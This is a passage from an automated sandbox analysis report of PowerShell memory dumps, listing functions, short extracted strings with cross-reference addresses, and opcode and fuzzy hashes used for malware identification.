-0k, xrefs: 0766C237
(f?l, xrefs: 0766D111
(f?l, xrefs: 0766CDF5
(f?l, xrefs: 0766D204
(f?l, xrefs: 0766C9D5
(f?l, xrefs: 0766C79E
(f?l, xrefs: 0766C8E8
4']q, xrefs: 0766BFB6
tL1k, xrefs: 0766C77C
(f?l, xrefs: 0766CA70
tL1k, xrefs: 0766D465
(f?l, xrefs: 0766C09F
(f?l, xrefs: 0766C6D6
4']q, xrefs: 0766CCA8
(f?l, xrefs: 0766CD5F
(f?l, xrefs: 0766D489
(f?l, xrefs: 0766C105
x.0k, xrefs: 0766CFC4

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
String ID: (f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$4']q$4']q$4']q$tL1k$tL1k$tL1k$tL1k$x.0k$x.0k$-0k$-0k
API String ID: 0-1363173363
Opcode ID: 3b9bcf69ac8b17e1052033cd654646b633e0b26ffaacba423d5acf92eb39aef2
Instruction ID: c83f89f52bbd0a2acd5e6a6d23a400cf41417364fd04f3d997783518cb85fad2
Opcode Fuzzy Hash: 3b9bcf69ac8b17e1052033cd654646b633e0b26ffaacba423d5acf92eb39aef2
Instruction Fuzzy Hash: BDC2D8B4B002149FDB24DB68CD94B9EB7B2EF85304F5084A9D91A6B345CB35ED82CF91

Function 07666148 Relevance: 38.7, Strings: 30, Instructions: 1180COMMON

Download Yara Rule

Strings

(f?l, xrefs: 07666852
4']q, xrefs: 07666EEA
(f?l, xrefs: 076668BC
-0k, xrefs: 07667265
(f?l, xrefs: 0766665B
(f?l, xrefs: 07668014
(f?l, xrefs: 07666714
(f?l, xrefs: 07666CE6
(f?l, xrefs: 07666BE4
4']q, xrefs: 07666EF6
(f?l, xrefs: 07666AF2
(f?l, xrefs: 076670C8
(f?l, xrefs: 07666665
(f?l, xrefs: 07666FA3
4']q, xrefs: 07667CFE
tP]q, xrefs: 0766642C
(f?l, xrefs: 07666927
tP]q, xrefs: 07666438
(f?l, xrefs: 07666C8A
(f?l, xrefs: 07666B4A
(f?l, xrefs: 0766800A
(f?l, xrefs: 0766671E
x.0k, xrefs: 07667214
(f?l, xrefs: 07667073
4']q, xrefs: 076662A1
4']q, xrefs: 07667CF2
4']q, xrefs: 076662AD
(f?l, xrefs: 0766699E
(f?l, xrefs: 07666F99
tL1k, xrefs: 07666972

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
String ID: (f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$4']q$4']q$4']q$4']q$4']q$4']q$tL1k$tP]q$tP]q$x.0k$-0k
API String ID: 0-395945486
Opcode ID: cc537404ac804e31b3c1642f6bd4b4b5919ad10759b9f5fbe0ffec9f89a11a21
Instruction ID: 69a88e2c3fea2702f2ce49ab1f3d0df572f73dd817880ffb0af123deccb9f030
Opcode Fuzzy Hash: cc537404ac804e31b3c1642f6bd4b4b5919ad10759b9f5fbe0ffec9f89a11a21
Instruction Fuzzy Hash: 8EA208B4A00215DFDB24CF64C954BAABBB2EF84304F50C8AAD51AAB345CB35ED46CF51

Function 07667302 Relevance: 33.4, Strings: 26, Instructions: 890COMMON

Download Yara Rule

Strings

(f?l, xrefs: 07666852
(f?l, xrefs: 07667656
(f?l, xrefs: 07667403
4']q, xrefs: 07666EEA
(f?l, xrefs: 076668BC
-0k, xrefs: 07667265
(f?l, xrefs: 07666CE6
(f?l, xrefs: 07666BE4
(f?l, xrefs: 0766745D
(f?l, xrefs: 07666AF2
(f?l, xrefs: 076670C8
(f?l, xrefs: 07667731
tL1k, xrefs: 0766777B
(f?l, xrefs: 076676A6
(f?l, xrefs: 0766773B
(f?l, xrefs: 07666927
(f?l, xrefs: 07666C8A
(f?l, xrefs: 07666B4A
x.0k, xrefs: 07667214
(f?l, xrefs: 07667073
(f?l, xrefs: 076676B2
(f?l, xrefs: 07667648
(f?l, xrefs: 0766735F
(f?l, xrefs: 0766699E
(f?l, xrefs: 07666F99
tL1k, xrefs: 07666972

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
String ID: (f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$4']q$tL1k$tL1k$x.0k$-0k
API String ID: 0-1664233233
Opcode ID: f80b55b0ae6fa9dd8f13498784bf54f268715608aa854b1fc80df874157c44f2
Instruction ID: eed6dcf9202630aedfcd48d4e70ed3d044ab99076d6c44859d1106b6a7af4cb0
Opcode Fuzzy Hash: f80b55b0ae6fa9dd8f13498784bf54f268715608aa854b1fc80df874157c44f2
Instruction Fuzzy Hash: A982C4B4A00215DFDB24DF64C994BAABBB2EF84304F10C8A9D51A6B741CB35ED86CF51

Function 076674CF Relevance: 20.6, Strings: 16, Instructions: 646COMMON

Download Yara Rule

Strings

(f?l, xrefs: 07666852
(f?l, xrefs: 07666927
(f?l, xrefs: 07666C8A
4']q, xrefs: 07666EEA
(f?l, xrefs: 07666B4A
(f?l, xrefs: 076668BC
-0k, xrefs: 07667265
x.0k, xrefs: 07667214
(f?l, xrefs: 07667073
(f?l, xrefs: 07666CE6
(f?l, xrefs: 07666BE4
(f?l, xrefs: 07666AF2
(f?l, xrefs: 076670C8
(f?l, xrefs: 0766699E
(f?l, xrefs: 07666F99
tL1k, xrefs: 07666972

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
String ID: (f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$4']q$tL1k$x.0k$-0k
API String ID: 0-756711363
Opcode ID: 2ef3280bb3bf59d4842352f172f1314389c5a463a2d8d08cf16a7a8a3c99c747
Instruction ID: 6fcf461ddf119b4d3e8ff90b7b7b41023bbb921a1608adced91f43dcbd2d7571
Opcode Fuzzy Hash: 2ef3280bb3bf59d4842352f172f1314389c5a463a2d8d08cf16a7a8a3c99c747
Instruction Fuzzy Hash: EB52C6B4A00215DFDB24DF24C995B9ABBB2EF84304F10C8A9D51A6B741CB36ED86CF51

Function 0766D272 Relevance: 20.6, Strings: 16, Instructions: 624COMMON

Download Yara Rule

Strings

(f?l, xrefs: 0766C668
(f?l, xrefs: 0766CE50
(f?l, xrefs: 0766C939
(f?l, xrefs: 0766CDF5
(f?l, xrefs: 0766C9D5
(f?l, xrefs: 0766C79E
(f?l, xrefs: 0766C8E8
(f?l, xrefs: 0766CACE
tL1k, xrefs: 0766C77C
(f?l, xrefs: 0766CA70
(f?l, xrefs: 0766C735
(f?l, xrefs: 0766C6D6
4']q, xrefs: 0766CCA8
-0k, xrefs: 0766D015
(f?l, xrefs: 0766CD5F
x.0k, xrefs: 0766CFC4

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
String ID: (f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$4']q$tL1k$x.0k$-0k
API String ID: 0-756711363
Opcode ID: 6fd102e95fd7edf050a6838ab76e005d17ee2040746c0c2d67e346362552d2d8
Instruction ID: e169f84f0215f667df9d0ff1d4341f4f23dbcb641fc88ca3dea8a9fbb891e98f
Opcode Fuzzy Hash: 6fd102e95fd7edf050a6838ab76e005d17ee2040746c0c2d67e346362552d2d8
Instruction Fuzzy Hash: 6742E9B4B002149FDB24DB68CD94B9EB7B6EF85304F1084A9D91A6B345CB35ED42CF91

Function 0766D504 Relevance: 11.7, Strings: 9, Instructions: 435COMMON

Download Yara Rule

Strings

tL1k, xrefs: 0766D6F2
(f?l, xrefs: 0766D57E
(f?l, xrefs: 0766DA1E
(f?l, xrefs: 0766D68C
x.0k, xrefs: 0766DCAD
4<l, xrefs: 0766D5CC
(f?l, xrefs: 0766DB90
4']q, xrefs: 0766D779
(f?l, xrefs: 0766D884

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
String ID: (f?l$(f?l$(f?l$(f?l$(f?l$4']q$4<l$tL1k$x.0k
API String ID: 0-2483925858
Opcode ID: 276cbf11a57b6c8f6b0c944ced14c3169d8f6f414acbaa8f6c3a70465c5133b4
Instruction ID: c0286493bced63079b2c5e4651c065781f91f09d4d8c9110dca85f7f8a24b07f
Opcode Fuzzy Hash: 276cbf11a57b6c8f6b0c944ced14c3169d8f6f414acbaa8f6c3a70465c5133b4
Instruction Fuzzy Hash: 96125EB4B04215DFDB20CB28C995BA9B7B2EF45304F4084E9D95AAB740CB35ED82CF51

Function 0766D2F9 Relevance: 11.7, Strings: 9, Instructions: 431COMMON

Download Yara Rule

Strings

tL1k, xrefs: 0766D6F2
(f?l, xrefs: 0766D57E
(f?l, xrefs: 0766DA1E
(f?l, xrefs: 0766D68C
x.0k, xrefs: 0766DCAD
4<l, xrefs: 0766D5CC
(f?l, xrefs: 0766DB90
4']q, xrefs: 0766D779
(f?l, xrefs: 0766D884

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
String ID: (f?l$(f?l$(f?l$(f?l$(f?l$4']q$4<l$tL1k$x.0k
API String ID: 0-2483925858
Opcode ID: 19151b2159e2038fc2ab13d51a6365bff88ac73ac1e67eea93f9cca71fd5075d
Instruction ID: ebf4bd6cf24e56408a20d18c62e0bee8e2fd10b8a6cb2eb520db4e3a853a4b05
Opcode Fuzzy Hash: 19151b2159e2038fc2ab13d51a6365bff88ac73ac1e67eea93f9cca71fd5075d
Instruction Fuzzy Hash: 27124DB4B00215DFDB20CB28C995BA9B7B6EF45304F9084E9D95AAB740CB35ED82CF51

Function 07668468 Relevance: 10.4, Strings: 8, Instructions: 373COMMON

Download Yara Rule

Strings

x.0k, xrefs: 0766883C
4']q, xrefs: 07668771
(f?l, xrefs: 07668589
4']q, xrefs: 0766877D
(f?l, xrefs: 07668593
4']q, xrefs: 076687FC
4']q, xrefs: 076687F0
-0k, xrefs: 07668881

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
String ID: (f?l$(f?l$4']q$4']q$4']q$4']q$x.0k$-0k
API String ID: 0-3351746519
Opcode ID: b5bf6b0afc262e3b920d56295ef348fe0e0a2835141b7195fd61c78e0859a13b
Instruction ID: 4b2680b5e905f8587b96ed1332a8f8e329a37800149b439e20b47ef14b8120e6
Opcode Fuzzy Hash: b5bf6b0afc262e3b920d56295ef348fe0e0a2835141b7195fd61c78e0859a13b
Instruction Fuzzy Hash: 15E1CFB4B102069FCB14DB78C555BAEBBB2AF88704F50C829D9026F355CB75EC46CBA1

Function 07668449 Relevance: 6.6, Strings: 5, Instructions: 306COMMON

Download Yara Rule

Strings

x.0k, xrefs: 0766883C
4']q, xrefs: 07668771
(f?l, xrefs: 07668589
4']q, xrefs: 076687F0
-0k, xrefs: 07668881

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
String ID: (f?l$4']q$4']q$x.0k$-0k
API String ID: 0-2069467130
Opcode ID: 4317069a4a1cab875dd93176a25d22a15fd1ba4ab7d425d4fa2e25a7feb1f817
Instruction ID: 944cbfdf528784c21c2acaf6523dbc092213b77a359d946db8e2e0460c6f5cab
Opcode Fuzzy Hash: 4317069a4a1cab875dd93176a25d22a15fd1ba4ab7d425d4fa2e25a7feb1f817
Instruction Fuzzy Hash: 29C1CFB4A102069FCB14CB78C545FAEBBB2AF89704F14C469D9066F355CB35EC86CBA1

Function 07662070 Relevance: 5.6, Strings: 4, Instructions: 575COMMON

Download Yara Rule

Strings

4']q, xrefs: 07662512
4']q, xrefs: 07662508
4']q, xrefs: 076623B8
4']q, xrefs: 076623AE

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q
API String ID: 0-1785108022
Opcode ID: 43d81f9d32b9347ddd5cc33eb30c604ae6d9b2c60352820eefd4eae42a8e1a63
Instruction ID: 042cd509abcc5be8efcfdfaa49ecf74d28fce936c988c63a349d115dd7020e99
Opcode Fuzzy Hash: 43d81f9d32b9347ddd5cc33eb30c604ae6d9b2c60352820eefd4eae42a8e1a63
Instruction Fuzzy Hash: A61268B17042058FCB159B78C8296AABBE6BFC1310F54887AD906DB395DB35CC46C7A2

Function 07663E00 Relevance: 3.9, Strings: 3, Instructions: 124COMMON

Download Yara Rule

Strings

$]q, xrefs: 07663E67
$]q, xrefs: 07663E5B
$]q, xrefs: 07663E23

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q
API String ID: 0-182748909
Opcode ID: 699e629eb434dad5dbdac24b762dec187e3d46f5978b4c7b010269d5994a00d4
Instruction ID: 776da4f137670213b9c52f10a69773dbf49a37d873393f08bec761fc0c087ac3
Opcode Fuzzy Hash: 699e629eb434dad5dbdac24b762dec187e3d46f5978b4c7b010269d5994a00d4
Instruction Fuzzy Hash: 464126B6B002159BCB249A7EC9846AEFBF5AF84610F54882BC846EB341DB31DD01C7F1

Function 07664548 Relevance: 2.9, Strings: 2, Instructions: 434COMMON

Download Yara Rule

Strings

4']q, xrefs: 0766494F
4']q, xrefs: 07664943

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q
API String ID: 0-3120983240
Opcode ID: 11ea25134a73dc0b90ef92141d9a5ad27d8549802fc1e42a7773083bd86aacfc
Instruction ID: 596fdc0d3e9ec892bb6458ebb46a99f7fdc320078e8e0787efc9da2d28f213db
Opcode Fuzzy Hash: 11ea25134a73dc0b90ef92141d9a5ad27d8549802fc1e42a7773083bd86aacfc
Instruction Fuzzy Hash: 8F02CEB4B002449FCB04CB68C544EAABBF6EF89704F54C469E9169F355CB72EE42CB91

Function 07663DE0 Relevance: 2.6, Strings: 2, Instructions: 78COMMON

Download Yara Rule

Strings

$]q, xrefs: 07663E5B
$]q, xrefs: 07663E23

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
String ID: $]q$$]q
API String ID: 0-127220927
Opcode ID: 1a9e5220e404fa22de9abb5056533fc1bc836cd92e83f83126845e23fa271a67
Instruction ID: d66acedafbfc1719e897491e0ac5a98e07bfc4019ea0b6f65bae0ae7e0a9151e
Opcode Fuzzy Hash: 1a9e5220e404fa22de9abb5056533fc1bc836cd92e83f83126845e23fa271a67
Instruction Fuzzy Hash: A42147B9900356DFCB258F7EC988165BBF0EF46610B990597CC8AEB352D7309900C7B1

Function 0766452C Relevance: 1.6, Strings: 1, Instructions: 385COMMON

Download Yara Rule

Strings

4']q, xrefs: 07664943

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: e258b5129ab795485741e1a77988fe38a84836edfc0a15b43aa6c8edaaa49b54
Instruction ID: 7d42419a9729efcd11a7687a99da2e7dee15fc24ae28b35ea4ca9a5bb4e797ad
Opcode Fuzzy Hash: e258b5129ab795485741e1a77988fe38a84836edfc0a15b43aa6c8edaaa49b54
Instruction Fuzzy Hash: 7DF19EB4B00245DFCB14CB68C584EA9BBF2EF85704F54C469E916AB355CB72EE42CB90

Function 07668908 Relevance: 1.4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

Strings

x.0k, xrefs: 076689BA

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
String ID: x.0k
API String ID: 0-3090854566
Opcode ID: f33e901a531f5384dd57212b00aaddbd21c62f03d813ff28aa29d47686decae2
Instruction ID: d1cacc1a72ff241079e7891beab6a72890aa9ce36a13581c835b14f59b9a1204
Opcode Fuzzy Hash: f33e901a531f5384dd57212b00aaddbd21c62f03d813ff28aa29d47686decae2
Instruction Fuzzy Hash: FD31B3B0B501049BDB14D778C955FAEBAA3AFC5704F10C429E9016F795CF7AAC42CBA1

Function 047E7322 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2652296677.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_47e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62e80e2ab883f48bb842d1f9e2bceb6a5d7e075ac08eeee65f2ff3754b0bf7ef
Instruction ID: 94820e0bc950c6305f6fcf7945c9d8b65f8be0fc6f314ae988744534e31a853a
Opcode Fuzzy Hash: 62e80e2ab883f48bb842d1f9e2bceb6a5d7e075ac08eeee65f2ff3754b0bf7ef
Instruction Fuzzy Hash: F1A16035B002489FDB18DFA5D944AADBBB6FF88304F158659E806AF364DB34BD49CB40

Function 07668C08 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1674bc0eb7f42fa403a0e1d232d67254c2055710660adb481a8f77998c1a0f5
Instruction ID: 910895cda337af497ebe95eb30f0cd007b6281cd4a58a96adc00ca68bb1cb5fd
Opcode Fuzzy Hash: d1674bc0eb7f42fa403a0e1d232d67254c2055710660adb481a8f77998c1a0f5
Instruction Fuzzy Hash: 0B7178B5700207DFCB249F7984592AABBE1EFC5200F54887ADA46CB341DB35D846CBA1

Function 047E7BDE Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2652296677.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_47e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2930cb5025b018e867e9f30b699adb6fbcc32f7161058009cbf59d83cca1e20e
Instruction ID: a45c6b5b82427b5626af7d59b367cfba4346dc936159b11e11d22848344a857a
Opcode Fuzzy Hash: 2930cb5025b018e867e9f30b699adb6fbcc32f7161058009cbf59d83cca1e20e
Instruction Fuzzy Hash: 7D714D70A002499FDB18DFB5D484AADBBF6FF88304F148529D416AB3A0DB35AD46CF51

Function 047E7A5B Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2652296677.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_47e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2238e7ae988aa0b1d8e7fc007b2e537535eddfcb4e386a28651b4ef314e1287
Instruction ID: 144e3897a114ac33250c1f735a0a08563f8100c07c750fe62f94b778413e2f4b
Opcode Fuzzy Hash: e2238e7ae988aa0b1d8e7fc007b2e537535eddfcb4e386a28651b4ef314e1287
Instruction Fuzzy Hash: 4F617E30A00649CFDB18DF69C484AADBBB6FF88314F148969D4069B751DB75AD46CB80

Function 047ED651 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2652296677.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_47e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9afa6f35516607b4c8befe0a6fce8a4658cbe5c1687a2fa18202d9b2cf9a4d7c
Instruction ID: 341d8b99fc19bde688136ec5afb1e94bbe45ad8ec033fc0be853a6ba0d0e2958
Opcode Fuzzy Hash: 9afa6f35516607b4c8befe0a6fce8a4658cbe5c1687a2fa18202d9b2cf9a4d7c
Instruction Fuzzy Hash: B15193707002449FEB19DF79C4546BEBBF6EF89310F188869D8099B396CB35AC45CBA0

Function 047E7801 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2652296677.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_47e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2b3cb31689363d2c4bcf81867ed974530af647aa0ddeef9331d485e1bcd8a5c
Instruction ID: 84ac185953177d513cd3ce9aacc488405e72faed3756ceb970f7f50a810dcceb
Opcode Fuzzy Hash: d2b3cb31689363d2c4bcf81867ed974530af647aa0ddeef9331d485e1bcd8a5c
Instruction Fuzzy Hash: 19419D35B002459FDB19DB39C454ABEBBB2EF8D350F088569E406EB3A0CB34AC41CB90

Function 07662050 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a15952a899828cd3bd12fe9c4a1ac83ac22dc6bf30df6078e4971a3c519e1e66
Instruction ID: 1a6c7a5184376a1b593fc5e088e18f068ffacaee8f0bbf42a2c55f4f32f4357b
Opcode Fuzzy Hash: a15952a899828cd3bd12fe9c4a1ac83ac22dc6bf30df6078e4971a3c519e1e66
Instruction Fuzzy Hash: DD415EF1608202CFCB128F348965A7ABBF6BF45280F8448A6DA06DF355D735CC46C7A2

Function 047ED680 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2652296677.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_47e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fd5567f5ea9dcf613d5328552a6d27442c09e1bc3942f38aec626ebcb1c6908
Instruction ID: 22f2c4bc2f5f0e5756ffaaa5f8e2f632f1ac4a6e922036aec124c65d7899dad6
Opcode Fuzzy Hash: 4fd5567f5ea9dcf613d5328552a6d27442c09e1bc3942f38aec626ebcb1c6908
Instruction Fuzzy Hash: 0F413F307002049FDB18DF79D5947AEBAF7AFC8310F14C469D809AB395DB75AC458BA0

Function 047E7818 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2652296677.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_47e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b4d96257b923a01d210ea03fbf0cbd1428de67d80d428fa8255d08cd293f8e1
Instruction ID: 462e110407b58130d674eb31f643edcedbcf12f9ea3f10924d0d225139e0479a
Opcode Fuzzy Hash: 2b4d96257b923a01d210ea03fbf0cbd1428de67d80d428fa8255d08cd293f8e1
Instruction Fuzzy Hash: 26413B35B002059FDB18DB35C558ABEBBB6EF8C750F448568E406EB3A0DB34AD41DB90

Function 047E2BB0 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2652296677.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_47e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0836f803313946ab3ed5b8007e33f81bb8d2f8ad62bbb55e13cb5bc78d20045a
Instruction ID: d8f6e6b23d0e7e1b4238f0c88f5a2f5804765b7ccfc14caec3a30dc10c47eb03
Opcode Fuzzy Hash: 0836f803313946ab3ed5b8007e33f81bb8d2f8ad62bbb55e13cb5bc78d20045a
Instruction Fuzzy Hash: 36415774A002098FCB09CF59C194DBAFBB5FF48314B158699D901AB366C732FC90CBA0

Function 07668BE8 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5eb89bd6fa5ad2164fbe43c8fe04914c00bdfd44d88d7d061542eae8db9a4c44
Instruction ID: a7a6358cd12e1807b7a32f4542f9b4e1180353c4826f5a623b7a7b3b86ef72ba
Opcode Fuzzy Hash: 5eb89bd6fa5ad2164fbe43c8fe04914c00bdfd44d88d7d061542eae8db9a4c44
Instruction Fuzzy Hash: 6E213CF1A143038FDB105F358549379BFA19F82350F4444AADA16CB391DB35D986CBB2

Function 0474F520 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2652128801.000000000474D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0474D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_474d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72a8f10f1ba3cefd45f22d30d941d7d16681eee11e5d961f36296f2193d0155b
Instruction ID: 99303cc9702fb04cde3cc04736f86ea82cae6edd73218d9d245a276cc930ac45
Opcode Fuzzy Hash: 72a8f10f1ba3cefd45f22d30d941d7d16681eee11e5d961f36296f2193d0155b
Instruction Fuzzy Hash: 3321E075600200DFCF05DF64D9C0B26FFA5FB88314F24C5A9E9095A356C33AE856DBA2

Function 0474F614 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2652128801.000000000474D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0474D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_474d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c8ef10a94604b815bc52af81c797d46239757cff65a4d8ee27d7e72c6fded83
Instruction ID: 69e0d1d963157f00ccdd838f9c8d010483270d8e39700507f89e99ae264def4a
Opcode Fuzzy Hash: 1c8ef10a94604b815bc52af81c797d46239757cff65a4d8ee27d7e72c6fded83
Instruction Fuzzy Hash: C6212DB1604244DFCB44DF24DA80B36BBA5EBD8318F20866DD9094B361D73AA806CA63

Function 047EF4DC Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2652296677.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_47e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a63e5c7a6cbab10f8387d5a7e60877753e009bbc585080abba73631ec21ac4d0
Instruction ID: dfe307bed238319acba7512f74f2117dd3ff0084249d2e0c035a00adcdb5e534
